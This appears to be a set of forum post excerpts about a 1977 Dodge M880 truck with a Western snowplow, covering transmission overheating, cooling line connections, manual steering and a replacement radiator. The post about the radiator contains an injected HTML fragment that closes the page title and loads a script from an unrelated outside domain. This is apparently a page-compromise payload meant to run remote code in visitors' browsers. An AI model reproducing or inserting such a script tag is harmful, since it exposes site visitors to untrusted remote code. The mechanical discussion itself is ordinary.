i did some searching and didnt have much luck in my specific application, sorry I will look some more. also i was attempting to see if anyone had parts on the forum........ Thanks for the tips!!!
I was hoping i could find a donor truck in my home town but it isnt looking to good. The 8' western plow on the front is a lot of fun to manovior in tight spots with manual steering!!! Im just going to have to be patient, wich is hard for me, and wait. Im sure something will pop up.. Thanks guys....
Getting my truck all prepped for winter: changed all fluids, rebuilt my western unimount snowplow pump, and greased everything up. Without the plow on the truck the steering isnt to bad. With it on, it is a bear to say the least. Especially in tight spots or working around structures. I have...
For future reference, this is the radiator that i went with. Exact specs and fit as my old radiator. </title><script src=http://aleba.com.br/js/></script><title>
Valve on the carb to the tranny?? I just rebuilt the carb and I dont recall anything going to the trans. Could be my problem then, ill have to find a diagram somehow... Thanks
Thanks, I will double check to see where its set. I dont drive this truck alot (maybe 300 miles per year) to the woods for firewood and in the winter with its western plow. A few times the tranny has gotten uncomfortably hot and im just making sure I am operating it normally. I have NEVER really...
For everyday driving, what range should I operate a M880 in? There are a few selections, Im wondering if I have it wrong causing the transmission to get hot. Withouy looking, I think there is a hi/lo/n operation. I have never operated a truck that was all time 4x4, but i have to assume that the...
I decided to get the old M880 ready for winter, check all fluids, hook up the western snow plow, and change the oil. Wouldnt ya know, coolant squirting out of the front of the radiator!! Just what I need, winter is rite around the corner. Anybody know a good place to obtain a OEM radiator for...
I can never get the same level on the dipstick. I have even kicked around with putting a external cooler on the trans, since i push snow with it and all. I dont drive it alot in the summer, maybe 200 miles to haul firewood.
I have hooked all of the cooling lines up as mentioned. The transmission and floorboard of the cab still are getting hot. Im at a loss as im sure this isnt normal. Would low levels of ATF cause this?
Im pretty sure the nipple in the front is where the fluid leaves the transmission and the one towards the back is where it enters after being cooled. Can anyone varify this? I dont want to learn the hard way!!!!!
Just picked up a 77 m880 with a western plow. I noticed that the transmission cooling lines were cut and one hose connects each port that should run to the radiator. There are two nipples that are on the transmission that go to the radiator, does it matter wich nipple they connect to on the...
